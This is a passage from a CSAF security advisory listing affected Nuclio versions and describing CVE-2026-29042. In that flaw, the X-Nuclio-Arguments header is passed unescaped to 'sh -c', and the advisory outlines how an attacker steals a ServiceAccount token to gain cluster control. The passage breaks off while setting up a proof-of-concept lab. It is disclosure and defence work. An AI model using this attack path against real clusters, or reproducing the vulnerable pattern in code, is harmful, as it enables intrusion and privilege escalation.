                                "product": {
                                    "name": "vers:unknown/1.14.8",
                                    "product_id": "CSAFPID-5908885"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.1",
                                "product": {
                                    "name": "vers:unknown/1.15.1",
                                    "product_id": "CSAFPID-5908886"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.10",
                                "product": {
                                    "name": "vers:unknown/1.15.10",
                                    "product_id": "CSAFPID-5908887"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.11",
                                "product": {
                                    "name": "vers:unknown/1.15.11",
                                    "product_id": "CSAFPID-5908888"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.12",
                                "product": {
                                    "name": "vers:unknown/1.15.12",
                                    "product_id": "CSAFPID-5908889"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.13",
                                "product": {
                                    "name": "vers:unknown/1.15.13",
                                    "product_id": "CSAFPID-5908890"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.14",
                                "product": {
                                    "name": "vers:unknown/1.15.14",
                                    "product_id": "CSAFPID-5908891"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.15",
                                "product": {
                                    "name": "vers:unknown/1.15.15",
                                    "product_id": "CSAFPID-5908892"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.16",
                                "product": {
                                    "name": "vers:unknown/1.15.16",
                                    "product_id": "CSAFPID-5908893"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.17",
                                "product": {
                                    "name": "vers:unknown/1.15.17",
                                    "product_id": "CSAFPID-5908894"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.18",
                                "product": {
                                    "name": "vers:unknown/1.15.18",
                                    "product_id": "CSAFPID-5908895"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.19",
                                "product": {
                                    "name": "vers:unknown/1.15.19",
                                    "product_id": "CSAFPID-5908896"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.2",
                                "product": {
                                    "name": "vers:unknown/1.15.2",
                                    "product_id": "CSAFPID-5908897"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.3",
                                "product": {
                                    "name": "vers:unknown/1.15.3",
                                    "product_id": "CSAFPID-5908898"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.8",
                                "product": {
                                    "name": "vers:unknown/1.15.8",
                                    "product_id": "CSAFPID-5908899"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.15.9",
                                "product": {
                                    "name": "vers:unknown/1.15.9",
                                    "product_id": "CSAFPID-5908900"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.2.0",
                                "product": {
                                    "name": "vers:unknown/1.2.0",
                                    "product_id": "CSAFPID-5908901"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.2.2",
                                "product": {
                                    "name": "vers:unknown/1.2.2",
                                    "product_id": "CSAFPID-5908902"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.2.3",
                                "product": {
                                    "name": "vers:unknown/1.2.3",
                                    "product_id": "CSAFPID-5908903"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.0",
                                "product": {
                                    "name": "vers:unknown/1.3.0",
                                    "product_id": "CSAFPID-5908904"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.1",
                                "product": {
                                    "name": "vers:unknown/1.3.1",
                                    "product_id": "CSAFPID-5908905"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.10",
                                "product": {
                                    "name": "vers:unknown/1.3.10",
                                    "product_id": "CSAFPID-5908906"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.11",
                                "product": {
                                    "name": "vers:unknown/1.3.11",
                                    "product_id": "CSAFPID-5908907"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.12",
                                "product": {
                                    "name": "vers:unknown/1.3.12",
                                    "product_id": "CSAFPID-5908908"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.13",
                                "product": {
                                    "name": "vers:unknown/1.3.13",
                                    "product_id": "CSAFPID-5908909"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.14",
                                "product": {
                                    "name": "vers:unknown/1.3.14",
                                    "product_id": "CSAFPID-5908910"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.15",
                                "product": {
                                    "name": "vers:unknown/1.3.15",
                                    "product_id": "CSAFPID-5908911"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.16",
                                "product": {
                                    "name": "vers:unknown/1.3.16",
                                    "product_id": "CSAFPID-5908912"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.17",
                                "product": {
                                    "name": "vers:unknown/1.3.17",
                                    "product_id": "CSAFPID-5908913"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.18",
                                "product": {
                                    "name": "vers:unknown/1.3.18",
                                    "product_id": "CSAFPID-5908914"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.19",
                                "product": {
                                    "name": "vers:unknown/1.3.19",
                                    "product_id": "CSAFPID-5908915"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.2",
                                "product": {
                                    "name": "vers:unknown/1.3.2",
                                    "product_id": "CSAFPID-5908916"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.20",
                                "product": {
                                    "name": "vers:unknown/1.3.20",
                                    "product_id": "CSAFPID-5908917"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.21",
                                "product": {
                                    "name": "vers:unknown/1.3.21",
                                    "product_id": "CSAFPID-5908918"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.22",
                                "product": {
                                    "name": "vers:unknown/1.3.22",
                                    "product_id": "CSAFPID-5908919"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.3",
                                "product": {
                                    "name": "vers:unknown/1.3.3",
                                    "product_id": "CSAFPID-5908920"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.4",
                                "product": {
                                    "name": "vers:unknown/1.3.4",
                                    "product_id": "CSAFPID-5908921"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.5",
                                "product": {
                                    "name": "vers:unknown/1.3.5",
                                    "product_id": "CSAFPID-5908922"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.6",
                                "product": {
                                    "name": "vers:unknown/1.3.6",
                                    "product_id": "CSAFPID-5908923"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.7",
                                "product": {
                                    "name": "vers:unknown/1.3.7",
                                    "product_id": "CSAFPID-5908924"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.8",
                                "product": {
                                    "name": "vers:unknown/1.3.8",
                                    "product_id": "CSAFPID-5908925"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.3.9",
                                "product": {
                                    "name": "vers:unknown/1.3.9",
                                    "product_id": "CSAFPID-5908926"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.0",
                                "product": {
                                    "name": "vers:unknown/1.4.0",
                                    "product_id": "CSAFPID-5908927"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.1",
                                "product": {
                                    "name": "vers:unknown/1.4.1",
                                    "product_id": "CSAFPID-5908928"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.10",
                                "product": {
                                    "name": "vers:unknown/1.4.10",
                                    "product_id": "CSAFPID-5908929"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.11",
                                "product": {
                                    "name": "vers:unknown/1.4.11",
                                    "product_id": "CSAFPID-5908930"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.12",
                                "product": {
                                    "name": "vers:unknown/1.4.12",
                                    "product_id": "CSAFPID-5908931"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.13",
                                "product": {
                                    "name": "vers:unknown/1.4.13",
                                    "product_id": "CSAFPID-5908932"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.14",
                                "product": {
                                    "name": "vers:unknown/1.4.14",
                                    "product_id": "CSAFPID-5908933"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.15",
                                "product": {
                                    "name": "vers:unknown/1.4.15",
                                    "product_id": "CSAFPID-5908934"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.16",
                                "product": {
                                    "name": "vers:unknown/1.4.16",
                                    "product_id": "CSAFPID-5908935"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.17",
                                "product": {
                                    "name": "vers:unknown/1.4.17",
                                    "product_id": "CSAFPID-5908936"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.2",
                                "product": {
                                    "name": "vers:unknown/1.4.2",
                                    "product_id": "CSAFPID-5908937"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.3",
                                "product": {
                                    "name": "vers:unknown/1.4.3",
                                    "product_id": "CSAFPID-5908938"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.4",
                                "product": {
                                    "name": "vers:unknown/1.4.4",
                                    "product_id": "CSAFPID-5908939"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.5",
                                "product": {
                                    "name": "vers:unknown/1.4.5",
                                    "product_id": "CSAFPID-5908940"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.6",
                                "product": {
                                    "name": "vers:unknown/1.4.6",
                                    "product_id": "CSAFPID-5908941"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.7",
                                "product": {
                                    "name": "vers:unknown/1.4.7",
                                    "product_id": "CSAFPID-5908942"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.8",
                                "product": {
                                    "name": "vers:unknown/1.4.8",
                                    "product_id": "CSAFPID-5908943"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.4.9",
                                "product": {
                                    "name": "vers:unknown/1.4.9",
                                    "product_id": "CSAFPID-5908944"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.0",
                                "product": {
                                    "name": "vers:unknown/1.5.0",
                                    "product_id": "CSAFPID-5908945"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.1",
                                "product": {
                                    "name": "vers:unknown/1.5.1",
                                    "product_id": "CSAFPID-5908946"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.10",
                                "product": {
                                    "name": "vers:unknown/1.5.10",
                                    "product_id": "CSAFPID-5908947"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.11",
                                "product": {
                                    "name": "vers:unknown/1.5.11",
                                    "product_id": "CSAFPID-5908948"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.12",
                                "product": {
                                    "name": "vers:unknown/1.5.12",
                                    "product_id": "CSAFPID-5908949"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.13",
                                "product": {
                                    "name": "vers:unknown/1.5.13",
                                    "product_id": "CSAFPID-5908950"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.14",
                                "product": {
                                    "name": "vers:unknown/1.5.14",
                                    "product_id": "CSAFPID-5908951"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.15",
                                "product": {
                                    "name": "vers:unknown/1.5.15",
                                    "product_id": "CSAFPID-5908952"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.16",
                                "product": {
                                    "name": "vers:unknown/1.5.16",
                                    "product_id": "CSAFPID-5908953"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.2",
                                "product": {
                                    "name": "vers:unknown/1.5.2",
                                    "product_id": "CSAFPID-5908954"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.3",
                                "product": {
                                    "name": "vers:unknown/1.5.3",
                                    "product_id": "CSAFPID-5908955"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.4",
                                "product": {
                                    "name": "vers:unknown/1.5.4",
                                    "product_id": "CSAFPID-5908956"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.5",
                                "product": {
                                    "name": "vers:unknown/1.5.5",
                                    "product_id": "CSAFPID-5908957"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.6",
                                "product": {
                                    "name": "vers:unknown/1.5.6",
                                    "product_id": "CSAFPID-5908958"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.7",
                                "product": {
                                    "name": "vers:unknown/1.5.7",
                                    "product_id": "CSAFPID-5908959"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.8",
                                "product": {
                                    "name": "vers:unknown/1.5.8",
                                    "product_id": "CSAFPID-5908960"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.5.9",
                                "product": {
                                    "name": "vers:unknown/1.5.9",
                                    "product_id": "CSAFPID-5908961"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.0",
                                "product": {
                                    "name": "vers:unknown/1.6.0",
                                    "product_id": "CSAFPID-5908962"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.1",
                                "product": {
                                    "name": "vers:unknown/1.6.1",
                                    "product_id": "CSAFPID-5908963"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.10",
                                "product": {
                                    "name": "vers:unknown/1.6.10",
                                    "product_id": "CSAFPID-5908964"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.11",
                                "product": {
                                    "name": "vers:unknown/1.6.11",
                                    "product_id": "CSAFPID-5908965"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.12",
                                "product": {
                                    "name": "vers:unknown/1.6.12",
                                    "product_id": "CSAFPID-5908966"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.13",
                                "product": {
                                    "name": "vers:unknown/1.6.13",
                                    "product_id": "CSAFPID-5908967"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.14",
                                "product": {
                                    "name": "vers:unknown/1.6.14",
                                    "product_id": "CSAFPID-5908968"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.15",
                                "product": {
                                    "name": "vers:unknown/1.6.15",
                                    "product_id": "CSAFPID-5908969"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.16",
                                "product": {
                                    "name": "vers:unknown/1.6.16",
                                    "product_id": "CSAFPID-5908970"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.17",
                                "product": {
                                    "name": "vers:unknown/1.6.17",
                                    "product_id": "CSAFPID-5908971"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.18",
                                "product": {
                                    "name": "vers:unknown/1.6.18",
                                    "product_id": "CSAFPID-5908972"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.19",
                                "product": {
                                    "name": "vers:unknown/1.6.19",
                                    "product_id": "CSAFPID-5908973"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.2",
                                "product": {
                                    "name": "vers:unknown/1.6.2",
                                    "product_id": "CSAFPID-5908974"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.20",
                                "product": {
                                    "name": "vers:unknown/1.6.20",
                                    "product_id": "CSAFPID-5908975"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.21",
                                "product": {
                                    "name": "vers:unknown/1.6.21",
                                    "product_id": "CSAFPID-5908976"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.22",
                                "product": {
                                    "name": "vers:unknown/1.6.22",
                                    "product_id": "CSAFPID-5908977"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.23",
                                "product": {
                                    "name": "vers:unknown/1.6.23",
                                    "product_id": "CSAFPID-5908978"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.24",
                                "product": {
                                    "name": "vers:unknown/1.6.24",
                                    "product_id": "CSAFPID-5908979"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.25",
                                "product": {
                                    "name": "vers:unknown/1.6.25",
                                    "product_id": "CSAFPID-5908980"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.26",
                                "product": {
                                    "name": "vers:unknown/1.6.26",
                                    "product_id": "CSAFPID-5908981"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.27",
                                "product": {
                                    "name": "vers:unknown/1.6.27",
                                    "product_id": "CSAFPID-5908982"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.28",
                                "product": {
                                    "name": "vers:unknown/1.6.28",
                                    "product_id": "CSAFPID-5908983"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.29",
                                "product": {
                                    "name": "vers:unknown/1.6.29",
                                    "product_id": "CSAFPID-5908984"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.3",
                                "product": {
                                    "name": "vers:unknown/1.6.3",
                                    "product_id": "CSAFPID-5908985"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.30",
                                "product": {
                                    "name": "vers:unknown/1.6.30",
                                    "product_id": "CSAFPID-5908986"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.4",
                                "product": {
                                    "name": "vers:unknown/1.6.4",
                                    "product_id": "CSAFPID-5908987"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.5",
                                "product": {
                                    "name": "vers:unknown/1.6.5",
                                    "product_id": "CSAFPID-5908988"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.6",
                                "product": {
                                    "name": "vers:unknown/1.6.6",
                                    "product_id": "CSAFPID-5908989"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.7",
                                "product": {
                                    "name": "vers:unknown/1.6.7",
                                    "product_id": "CSAFPID-5908990"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.8",
                                "product": {
                                    "name": "vers:unknown/1.6.8",
                                    "product_id": "CSAFPID-5908991"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.6.9",
                                "product": {
                                    "name": "vers:unknown/1.6.9",
                                    "product_id": "CSAFPID-5908992"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.0",
                                "product": {
                                    "name": "vers:unknown/1.7.0",
                                    "product_id": "CSAFPID-5908993"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.1",
                                "product": {
                                    "name": "vers:unknown/1.7.1",
                                    "product_id": "CSAFPID-5908994"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.10",
                                "product": {
                                    "name": "vers:unknown/1.7.10",
                                    "product_id": "CSAFPID-5908995"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.11",
                                "product": {
                                    "name": "vers:unknown/1.7.11",
                                    "product_id": "CSAFPID-5908996"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.2",
                                "product": {
                                    "name": "vers:unknown/1.7.2",
                                    "product_id": "CSAFPID-5908997"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.3",
                                "product": {
                                    "name": "vers:unknown/1.7.3",
                                    "product_id": "CSAFPID-5908998"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.4",
                                "product": {
                                    "name": "vers:unknown/1.7.4",
                                    "product_id": "CSAFPID-5908999"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.5",
                                "product": {
                                    "name": "vers:unknown/1.7.5",
                                    "product_id": "CSAFPID-5909000"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.6",
                                "product": {
                                    "name": "vers:unknown/1.7.6",
                                    "product_id": "CSAFPID-5909001"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.7",
                                "product": {
                                    "name": "vers:unknown/1.7.7",
                                    "product_id": "CSAFPID-5909002"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.8",
                                "product": {
                                    "name": "vers:unknown/1.7.8",
                                    "product_id": "CSAFPID-5909003"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.7.9",
                                "product": {
                                    "name": "vers:unknown/1.7.9",
                                    "product_id": "CSAFPID-5909004"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.0",
                                "product": {
                                    "name": "vers:unknown/1.8.0",
                                    "product_id": "CSAFPID-5909005"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.1",
                                "product": {
                                    "name": "vers:unknown/1.8.1",
                                    "product_id": "CSAFPID-5909006"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.10",
                                "product": {
                                    "name": "vers:unknown/1.8.10",
                                    "product_id": "CSAFPID-5909007"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.11",
                                "product": {
                                    "name": "vers:unknown/1.8.11",
                                    "product_id": "CSAFPID-5909008"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.12",
                                "product": {
                                    "name": "vers:unknown/1.8.12",
                                    "product_id": "CSAFPID-5909009"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.13",
                                "product": {
                                    "name": "vers:unknown/1.8.13",
                                    "product_id": "CSAFPID-5909010"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.14",
                                "product": {
                                    "name": "vers:unknown/1.8.14",
                                    "product_id": "CSAFPID-5909011"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.15",
                                "product": {
                                    "name": "vers:unknown/1.8.15",
                                    "product_id": "CSAFPID-5909012"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.16",
                                "product": {
                                    "name": "vers:unknown/1.8.16",
                                    "product_id": "CSAFPID-5909013"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.17",
                                "product": {
                                    "name": "vers:unknown/1.8.17",
                                    "product_id": "CSAFPID-5909014"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.2",
                                "product": {
                                    "name": "vers:unknown/1.8.2",
                                    "product_id": "CSAFPID-5909015"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.3",
                                "product": {
                                    "name": "vers:unknown/1.8.3",
                                    "product_id": "CSAFPID-5909016"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.4",
                                "product": {
                                    "name": "vers:unknown/1.8.4",
                                    "product_id": "CSAFPID-5909017"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.5",
                                "product": {
                                    "name": "vers:unknown/1.8.5",
                                    "product_id": "CSAFPID-5909018"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.6",
                                "product": {
                                    "name": "vers:unknown/1.8.6",
                                    "product_id": "CSAFPID-5909019"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.7",
                                "product": {
                                    "name": "vers:unknown/1.8.7",
                                    "product_id": "CSAFPID-5909020"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.8",
                                "product": {
                                    "name": "vers:unknown/1.8.8",
                                    "product_id": "CSAFPID-5909021"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.8.9",
                                "product": {
                                    "name": "vers:unknown/1.8.9",
                                    "product_id": "CSAFPID-5909022"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.9.0",
                                "product": {
                                    "name": "vers:unknown/1.9.0",
                                    "product_id": "CSAFPID-5909023"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.9.1",
                                "product": {
                                    "name": "vers:unknown/1.9.1",
                                    "product_id": "CSAFPID-5909024"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0",
                                "product": {
                                    "name": "vers:unknown/2.0.0",
                                    "product_id": "CSAFPID-5909025"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.15.20",
                                "product": {
                                    "name": "vers:unknown/<1.15.20",
                                    "product_id": "CSAFPID-5765482"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<1.15.20",
                                "product": {
                                    "name": "vers:unknown/>=0|<1.15.20",
                                    "product_id": "CSAFPID-5759448"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "nuclio"
                    }
                ],
                "category": "vendor",
                "name": "nuclio"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-29042",
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nThis vulnerability exists in Nuclio's Shell Runtime component, allowing attackers with function invocation permissions to inject malicious commands via HTTP request headers, execute arbitrary code with root privileges in function containers, steal ServiceAccount Tokens with cluster-admin level permissions, and ultimately achieve complete control over the entire Kubernetes cluster. Recommended CWE classification: CWE-78 (OS Command Injection).\n\nNuclio Shell Runtime processes the `X-Nuclio-Arguments` HTTP header without validation or escaping, directly concatenating user input into shell commands executed via `sh -c`. This allows arbitrary command injection, enabling attackers to read sensitive files (including ServiceAccount tokens) and access the Kubernetes API with cluster-level privileges.\n\n## Details\n\n### Vulnerability Description\n\nThe Nuclio Shell Runtime component contains a critical command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the `X-Nuclio-Arguments` header and directly incorporates its value into shell commands without any validation or sanitization.\n\n### Root Cause Analysis\n\n**Vulnerable Code Location 1:** `pkg/processor/runtime/shell/runtime.go:289-297`\n\n```go\nfunc (s *shell) getCommandArguments(event nuclio.Event) []string {\n    arguments := event.GetHeaderString(headers.Arguments)\n\n    if arguments == \"\" {\n        arguments = s.configuration.Arguments\n    }\n\n    return strings.Split(arguments, \" \")  // No validation performed\n}\n```\n\nThe function retrieves the `X-Nuclio-Arguments` header value and splits it by spaces without any validation. Shell metacharacters like `;`, `|`, `&&`, backticks, and `$()` are not filtered or escaped.\n\n**Vulnerable Code Location 2:** `pkg/processor/runtime/shell/runtime.go:204-213`\n\n```go\nif s.commandInPath {\n    // if the command is an executable, run it as a command with sh -c.\n    cmd = exec.CommandContext(context, \"sh\", \"-c\", strings.Join(command, \" \"))\n} else {\n    // if the command is a shell script run it with sh(without -c).\n    cmd = exec.CommandContext(context, \"sh\", command...)\n}\n\ncmd.Stdin = strings.NewReader(string(event.GetBody()))\n```\n\nThe runtime joins the command array (which includes user-controlled arguments) into a single string and executes it using `sh -c`. This execution mode interprets shell metacharacters, enabling command injection.\n\n### Attack Flow\n\n1. Attacker sends HTTP request to Nuclio function with malicious `X-Nuclio-Arguments` header\n2. Runtime extracts header value without validation\n3. Malicious payload is concatenated into shell command\n4. Command is executed via `sh -c` with root privileges\n5. Attacker executes arbitrary commands (e.g., reading ServiceAccount token)\n6. Attacker uses stolen token to access Kubernetes API with cluster-admin privileges\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites:**\n- Docker installed\n- kubectl installed\n- Helm 3.x installed\n- 8GB RAM minimum\n\n**Step 1: Create Kubernetes Cluster**\n\n```bash\n# Install Kind\ncurl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.20.0/kind-linux-amd64\nchmod +x ./kind\nsudo mv ./kind /usr/local/bin/kind\n\n# Create cluster with registry configuration\ncat > kind-config.yaml <<EOF\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n- role: control-plane\n- role: worker\nEOF\n\nkind create cluster --name nuclio-test --config 